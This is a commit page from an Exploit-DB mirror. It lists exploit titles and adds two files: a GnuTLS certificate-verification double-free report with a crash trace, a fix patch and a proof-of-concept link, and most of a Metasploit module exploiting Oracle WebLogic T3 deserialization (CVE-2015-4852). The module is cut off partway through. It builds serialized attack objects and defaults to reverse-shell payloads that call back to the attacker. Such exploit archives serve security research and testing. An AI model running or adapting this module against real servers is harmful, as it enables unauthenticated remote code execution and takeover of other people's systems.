bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-03-29

Browse source 
15 changes to exploits/shellcodes

Microsoft Visio 2016 16.0.4738.1000 - 'Log in accounts' Denial of Service
gnutls 3.6.6 - 'verify_crt()' Use-After-Free

Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' (MS04-022)
Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (1)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)

NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses
NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities

Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations
Accellion Secure File Transfer Appliance - Multiple Command Restriction / Privilege Escalations

EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses
EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation
PonyOS 3.0 - VFS Permissions
PonyOS 3.0 - ELF Loader Privilege Escalation
PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - VFS Permissions Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - ELF Loader Local Privilege Escalation
Linux Kernel (PonyOS 3.0) - TTY 'ioctl()' Local Privilege Escalation

PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Kernel Privilege Escalation
Linux Kernel (PonyOS 4.0) - 'fluttershy' LD_LIBRARY_PATH Local Privilege Escalation
Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)
Microsoft Windows Manager (7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS16-039)

Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution

Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)

Linux Kernel 2.2 - TCP/IP Weakness Spoof IP
Linux Kernel 2.2 - TCP/IP Spoof IP

Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)
Microsoft Windows Media Encoder (XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (1)
Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation (2)
PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)
PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)
PHP 5.2.6 - 'create_function()' Code Injection (2)
PHP 5.2.6 - 'create_function()' Code Injection (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1)
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2)
WebKit - Insufficient Entropy Random Number Generator Weakness (1)
WebKit - Insufficient Entropy Random Number Generator Weakness (2)
WebKit - Insufficient Entropy Random Number Generator (1)
WebKit - Insufficient Entropy Random Number Generator (2)

SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking
SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking

Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)

Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)
CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)
Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (1)
Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (2)

LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting
LemonLDAP:NG 0.9.3.1 - User Enumeration / Cross-Site Scripting

Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities
Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities

MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure
MotoCMS - 'admin/data/users.xml' Access Restriction / Information Disclosure

Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses
Coppermine Gallery < 1.5.44 - Directory Traversal

Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change
Tenda W308R v2 Wireless Router 5.07.48 - (Cookie Session) Remote DNS Change

Cobub Razor 0.8.0 - Physical path Leakage
Cobub Razor 0.8.0 - Physical Path Leakage
Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion
Airbnb Clone Script - Multiple SQL Injection
Fat Free CRM 0.19.0 - HTML Injection
WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion
WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion
i-doit 1.12 - 'qr.php' Cross-Site Scripting
Job Portal 3.1 - 'job_submit' SQL Injection
BigTree 4.3.4 CMS - Multiple SQL Injection
Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
This commit is contained in:
Offensive Security 2019-03-29 05:01:59 +00:00
parent 4333ceb122
commit e4e3f1c741
16 changed files with 1416 additions and 43 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

158
exploits/linux/dos/46626.txt Normal file
View file

@ -0,0 +1,158 @@
## Description of problem:
This is a critical memory corruption vulnerability in any API backed by `verify_crt()`, including `gnutls_x509_trust_list_verify_crt()` and related routines. I suspect any client or server that verifies X.509 certificates with GnuTLS is likely affected and can be compromised by a malicious server or active network attacker.
In multi-threaded-clients this is a use-after-free vulnerability, and a double-free vulnerability in single-threaded clients.
The core bug is that `_gnutls_x509_get_signature` does not clear `signature->data` in the cleanup path:
[lib/x509/common.c](https://gitlab.com/gnutls/gnutls/blob/master/lib/x509/common.c#L1367)
```c
cleanup:
gnutls_free(signature->data); // <- pointer in datum parameter freed, but not cleared
return result;
}
```
Callers like `check_if_ca` assume that if `_gnutls_x509_get_signature` ever sets that parameter, then it can be safely freed, but that is not true:
[lib/x509/verify.c](https://gitlab.com/gnutls/gnutls/blob/master/lib/x509/verify.c#L180)
```c
ret =
_gnutls_x509_get_signature(cert->cert, "signature",
&cert_signature);
if (ret < 0) {
gnutls_assert();
goto fail;
}
// ...
fail:
result = 0;
cleanup:
_gnutls_free_datum(&cert_signed_data);
_gnutls_free_datum(&issuer_signed_data);
_gnutls_free_datum(&cert_signature); // <--- freed again
_gnutls_free_datum(&issuer_signature);
return result;
}
```
## Version of gnutls used:
gnutls-3.6.6.tar.xz
## Distributor of gnutls (e.g., Ubuntu, Fedora, RHEL)
Built from source.
## How reproducible: 100%
Steps to Reproduce:
* Download the attached PEM bundle and save it as `_gnutls_x509_get_signature.pem`
* Run `certtool --verify-chain --infile _gnutls_x509_get_signature.pem`
## Actual results:
``` certtool --verify-chain --infile [_gnutls_x509_get_signature.pem](/uploads/904ec642a8943ce4571b19cc66f10986/_gnutls_x509_get_signature.pem)
Subject: CN=VeriSign Class 3 Code Signing 2010 CA,OU=Terms of use at https://www.verisign.com/rpa (c)10,OU=VeriSign Trust Network,O=VeriSign\, Inc.,C=US
Issuer: CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\, Inc.,C=US
Signature algorithm: RSA-SHA1
Output: Not verified. The certificate is NOT trusted. The certificate issuer is unknown. The certificate chain uses insecure algorithm.
Subject: CN=VeriSign Class 3 Code Signing 2010 CA,OU=Terms of use at https://www.verisign.com/rpa (c)10,OU=VeriSign Trust Network,O=VeriSign\, Inc.,C=US
Issuer: CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\, Inc.,C=US
Checked against: CN=VeriSign Class 3 Code Signing 2010 CA,OU=Terms of use at https://www.verisign.com/rpa (c)10,OU=VeriSign Trust Network,O=VeriSign\, Inc.,C=US
Signature algorithm: RSA-SHA1
Output: Verified. The certificate is trusted.
*** Error in `certtool': double free or corruption (!prev): 0x000056069d657ef0 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7fc502b8ebcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7fc502b94f96]
/lib/x86_64-linux-gnu/libc.so.6(+0x777de)[0x7fc502b957de]
/usr/lib/x86_64-linux-gnu/libgnutls.so.30(+0xcfe50)[0x7fc50437ee50]
/usr/lib/x86_64-linux-gnu/libgnutls.so.30(+0xd0f76)[0x7fc50437ff76]
/usr/lib/x86_64-linux-gnu/libgnutls.so.30(gnutls_x509_trust_list_verify_crt2+0x44c)[0x7fc50438fe8c]
/usr/lib/x86_64-linux-gnu/libgnutls.so.30(gnutls_x509_trust_list_verify_crt+0x15)[0x7fc504390385]
certtool(+0xdff0)[0x56069cda2ff0]
certtool(+0x13570)[0x56069cda8570]
certtool(+0xc5c9)[0x56069cda15c9]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7fc502b3e2b1]
certtool(+0xc60a)[0x56069cda160a]
```
## Expected results:
No memory corruption.
```
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff65a83fa in __GI_abort () at abort.c:89
#2 0x00007ffff65e4bd0 in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff66d9d58 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff65eaf96 in malloc_printerr (action=3, str=0x7ffff66d9dd0 "double free or corruption (!prev)", ptr=<optimized out>, ar_ptr=<optimized out>) at malloc.c:5049
#4 0x00007ffff65eb7de in _int_free (av=0x7ffff690db00 <main_arena>, p=0x5555557ddf00, have_lock=0) at malloc.c:3905
#5 0x00007ffff7aa14e4 in _gnutls_free_datum (dat=0x7fffffffcf70) at ./../datum.h:47
#6 0x00007ffff7aa1dab in check_if_ca (cert=0x5555557ce9d0, issuer=0x5555557c7d50, max_path=0x7fffffffd0a8, flags=4) at verify.c:244
#7 0x00007ffff7aa56c4 in verify_crt (cert=0x5555557ce9d0, trusted_cas=0x555555797880, tcas_size=1, flags=4, output=0x7fffffffd0d0, vparams=0x7fffffffd0a0, end_cert=1) at verify.c:732
#8 0x00007ffff7aa604c in _gnutls_verify_crt_status (certificate_list=0x7fffffffd160, clist_size=1, trusted_cas=0x555555797880, tcas_size=1, flags=4, purpose=0x0, func=0x55555556536a <detailed_verification>) at verify.c:975
#9 0x00007ffff7abcd97 in gnutls_x509_trust_list_verify_crt2 (list=0x5555557c2ab0, cert_list=0x7fffffffd160, cert_list_size=2, data=0x0, elements=0, flags=4, voutput=0x7fffffffd350, func=0x55555556536a <detailed_verification>) at verify-high.c:1366
#10 0x00007ffff7abc44b in gnutls_x509_trust_list_verify_crt (list=0x5555557c2ab0, cert_list=0x5555557c42e0, cert_list_size=2, flags=4, voutput=0x7fffffffd350, func=0x55555556536a <detailed_verification>) at verify-high.c:1197
#11 0x0000555555565f91 in _verify_x509_mem (cert=0x5555557bfeb0, cert_size=7141, cinfo=0x7fffffffd400, use_system_trust=0, purpose=0x0, hostname=0x0, email=0x0) at certtool.c:2396
#12 0x0000555555566245 in verify_chain (cinfo=0x7fffffffd400) at certtool.c:2466
#13 0x0000555555563867 in cmd_parser (argc=4, argv=0x7fffffffd5e8) at certtool.c:1406
#14 0x00005555555605ff in main (argc=4, argv=0x7fffffffd5e8) at certtool.c:126
(gdb) frame 6
#6 0x00007ffff7aa1dab in check_if_ca (cert=0x5555557ce9d0, issuer=0x5555557c7d50, max_path=0x7fffffffd0a8, flags=4) at verify.c:244
244 _gnutls_free_datum(&cert_signature);
(gdb) p cert_signature
$1 = {data = 0x5555557ddf10 "Xې\366\377\177", size = 0}
(gdb)
```
I have verified this patch against HEAD fixes the issue:
```diff
diff --git a/lib/x509/common.c b/lib/x509/common.c
index 9ce427522..3f9e04202 100644
--- a/lib/x509/common.c
+++ b/lib/x509/common.c
@@ -1366,6 +1366,8 @@ _gnutls_x509_get_signature(ASN1_TYPE src, const char *src_name,
cleanup:
gnutls_free(signature->data);
+ signature->data = NULL;
+ signature->size = 0;
return result;
}
```
This update should fix another issue I noticed, the outer signatureAlgorithm parameters were not being compared to the tbsCertificate signatureAlgorithm parameters. It is required that these two fields match, otherwise an attacker can change the parameters without breaking the signature. Thanks to agl@ for helping me understand how it works.
It turns out only one algorithm actually used the parameters, RSA-PSS, and the parameters included a hash algorithm. I suppose this may have let you downgrade hash algorithm, but only from SHA-512 to SHA-256 or something similar, and some other less interesting parameters. I'm not a cryptographer, it feels like this may have further consequences but I don't know, so I filed it as a non-security bug:
https://gitlab.com/gnutls/gnutls/issues/698
It turns out that GnuTLS thought they were checking the parameters, but due to a typo they were checking them against themselves:
https://gitlab.com/gnutls/gnutls/commit/93e1ace816955da65dec5342494d4188514731be
The patch was easy:
- ret = _gnutls_x509_read_value(cert->cert, "signatureAlgorithm.parameters", &sp2);
+ ret = _gnutls_x509_read_value(cert->cert, "tbsCertificate.signature.parameters", &sp2);
And they added a testcase I made to their testsuite.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46626.zip

524
exploits/multiple/remote/46628.rb Executable file
View file

@ -0,0 +1,524 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
#include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
to the interface to execute code on vulnerable hosts.
},
'Author' =>
[
'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
'Stephen Breen', # Vulnerability Discovery
'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-4852']
],
'Privileged' => false,
'Platform' => %w{ unix win solaris },
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
'Payload' => {
'Encoder' => 'cmd/ifs',
'BadChars' => ' ',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
}
],
[ 'Windows',
'Platform' => 'win',
'Payload' => {},
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
],
[ 'Solaris',
'Platform' => 'solaris',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 28 2015'))
register_options([Opt::RPORT(7001)])
end
=begin This check is currently incompatible with the Tcp mixin. :-(
def check
resp = send_request_cgi(
'method' => 'GET',
'uri' => '/console/login/LoginForm.jsp'
)
return CheckCode::Unknown unless resp && resp.code == 200
unless resp.body.include?('Oracle WebLogic Server Administration Console')
vprint_warning("Oracle WebLogic Server banner cannot be found")
return CheckCode::Unknown
end
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
unless version
vprint_warning("Oracle WebLogic Server version cannot be found")
return CheckCode::Unknown
end
version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.2')
return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
return CheckCode::Safe
end
=end
def t3_handshake
# retrieved from network traffic
shake = "t3 12.2.1\n"
shake << "AS:255\n"
shake << "HL:19\n"
shake << "MS:10000000\n\n"
sock.put(shake)
sleep(1)
sock.get_once
end
def build_t3_request_object
# T3 request serialized data
# retrieved by watching network traffic
# This is a proprietary, undocumented protocol
# TODO: Cite a source for the dissection of in the following 14 lines:
data = '000005c3' # lenght of the packet
data << '01' # CMD_IDENTIFY_REQUEST
data << '65' # QOS
data << '01' # Flags:
# CONTEXT_JVMID_FLAG = 1 (has JVMIDs)
# CONTEXT_TX_FLAG = 2
# CONTEXT_TRACE_FLAG = 4
# CONTEXT_EXTENDED_FLAG = 8
# CONTEXT_EXTENDED_USER_FLAG = 16
data << 'ffffffff' # response id
data << 'ffffffff' # invocable id
data << '0000006a' # abbrev offset
data << '0000ea60' # reconnect timeout ??
data << '0000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499'
data << 'b4027973720078720178720278700000000a00'
data << '00000300000000000000060070707070707000'
data << '00000a000000030000000000000006007006'
data << 'fe010000' # ----- separator -----
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '72001d' # className (29 bytes):
data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
data << '5461626c65456e747279' # (continued)
data << '2f52658157f4f9ed' # serialVersionUID
data << '0c00007870' # remainder of object header
data << '72' # object header
data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo
data << '65726e616c2e5061636b616765496e666f' # (continued)
data << 'e6f723e7b8ae1ec9' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0008' # fieldCount = 8
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
data << '71007e0003' # (Handle) 0x007e0003
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
data << '71007e0003' # (Handle) 0x007e0003
data << '78707702000078' # block footers
data << 'fe010000' # ----- separator -----
data << 'aced0005' # JSO v5 header
data << '7372' # object header
data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry
data << '735461626c65456e747279' # (continued)
data << '2f52658157f4f9ed' # serialVersionUID
data << '0c' # EXTERNALIZABLE | BLOCKDATA
data << '00007870' # remainder of object header
data << '72' # object header
data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo
data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)
data << '972245516452463e' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0003' # fieldCount = 3
data << '5b0008' # array header (8 bytes)
data << '7061636b61676573' # ARRAY NAME = 'packages'
data << '740027' # TC_STRING className1 (39 bytes)
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo
data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
data << '3b' # (continued)
data << '4c000e' # object header (14 bytes)
data << '72656c6561736556657273696f6e' # releaseVersion
data << '740012' # TC_STRING (18 bytes)
data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes
data << '5b0012' # array header (18 bytes)
data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;
data << '740002' # TC_STRING (2 bytes)
data << '5b42' # 0x5b42 = [B
data << '78' # block footer
data << '720024' # class (36 bytes)
data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo
data << '7465726e616c2e5061636b616765496e666f' # (continued)
data << 'e6f723e7b8ae1ec9' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0008' # fieldCount = 8
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
data << '71' # TC_REFERENCE
data << '007e0004' # Handle = 0x007e0004
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
data << '71' # TC_REFERENCE
data << '007e0004' # Handle = 0x007e0004
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
data << '71' # TC_REFERENCE
data << '007e0004' # Handle = 0x007e0004
data << '78' # class footer
data << '70' # TC_NULL
data << '77020000' # BLOCKDATA (2 bytes): 0x0000
data << '78' # block footer
data << 'fe010000' # ----- separator -----
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '72001d' # className (29 bytes):
data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
data << '5461626c65456e747279' # (continued)
data << '2f52658157f4f9ed' # serialVersionUID
data << '0c00007870' # remainder of object header
data << '720021' # className (33 bytes)
data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo
data << '65726e616c2e50656572496e666f' # (continued)
data << '585474f39bc908f1' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0006' # fieldCount = 6
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '5b00087061636b61676573' # 5: Array: packages
data << '740027' # TC_STRING (39 bytes)
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;
data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
data << '3b' # (continued)
data << '78' # block footer
data << '720024' # class header
data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo;
data << '65726e616c2e56657273696f6e496e666f' # (continued)
data << '972245516452463e' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0003' # fieldCount = 3
data << '5b0008' # 0: Array
data << '7061636b6167657371' # packages
data << '007e0003' # Handle = 0x00730003
data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion
data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;
data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes
data << '740002' # TC_STRING (2 bytes)
data << '5b42' # VALUE = 0x5b42 = [B
data << '78' # block footer
data << '720024' # class header
data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo
data << '6e616c2e5061636b616765496e666f' # (continued)
data << 'e6f723e7b8ae1ec9' # serialVersionUID
data << '02' # SC_SERIALIZABLE
data << '0008' # fieldCount = 8
data << '4900056d616a6f72' # 0: Int: major
data << '4900056d696e6f72' # 1: Int: minor
data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
data << '49000b736572766963655061636b' # 3: Int: servicePack
data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
data << '71' # TC_REFERENCE
data << '007e0005' # Handle = 0x007e0005
data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
data << '71' # TC_REFERENCE
data << '007e0005' # Handle = 0x007e0005
data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
data << '71' # TC_REFERENCE
data << '007e0005' # Handle = 0x007e0005
data << '78' # class footer
data << '707702000078' # block footers
data << 'fe00ff' # this cruft again. some kind of footer
data << 'fe010000' # ----- separator -----
# weblogic.rjvm.JVMID object
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '720013' # class header
data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'
data << 'dc49c23ede121e2a' # serialVersionUID
data << '0c' # EXTERNALIZABLE | BLOCKDATA
data << '0000' # fieldCount = 0 (!!!)
data << '78' # block footer
data << '70' # NULL
data << '7750' # block header (80 bytes)
data << '21' # !
data << '000000000000000000' # 9 NULL BYTES
data << '0d' # strLength = 13 bytes
#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227
data << '3030302e3030302e3030302e30' # new string = 000.000.000.0
# (must be an IP, and length isn't trivially editable)
data << '00' # \0
data << '12' # strLength = 18 bytes
#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh
data << rand_text_alphanumeric(18).unpack('H*')[0]
data << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized)
data << '000000070000' # ??? UNKNOWN ???
data << rport.to_s(16).rjust(4, '0') # callback port
data << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ???
data << 'ffffffffff' # ??? UNKNOWN ???
data << '78' # block footer
data << 'fe010000' # ----- separator -----
# weblogic.rjvm.JVMID object
data << 'aced0005' # JSO v5 header
data << '73' # object header
data << '72' # class
data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID
data << 'dc49c23ede121e2a' # serialVersionUID
data << '0c' # EXTERNALIZABLE | BLOCKDATA
data << '0000' # fieldCount = 0
data << '78' # end block
data << '70' # TC_NULL
data << '77' # block header
data << '20' # length = 32 bytes
data << '0114dc42bd071a772700' # old string = ??? UNKNOWN ???
#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZAITON BREAKS THINGS)
data << '0d' # string length = 13 bytes (NOTE: do not edit)
#data << '3234322e3231342e312e323534' # original string = 242.214.1.254
data << '3030302e3030302e3030302e30' # new string = 000.000.000.0
# (must be an IP, and length isn't trivially editable)
#data << '61863d1d' # original string = ??? UNKNOWN ???
data << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized
data << '00000000' # NULL BYTES
data << '78' # block footer
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def send_payload_objdata
# payload creation
if target.name == 'Windows'
mycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
elsif target.name == 'Unix' || target.name == 'Solaris'
mycmd = payload.encoded
end
# basic weblogic ClassTableEntry object (serialized)
# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'
payload << 'fe010000' # ----- separator -----
payload << 'aced0005' # JSO v5 header
payload << '73' # object header
payload << '72' # class
payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
payload << '73735461626c65456e747279' # (cont)
payload << '2f52658157f4f9ed' # serialVersionUID
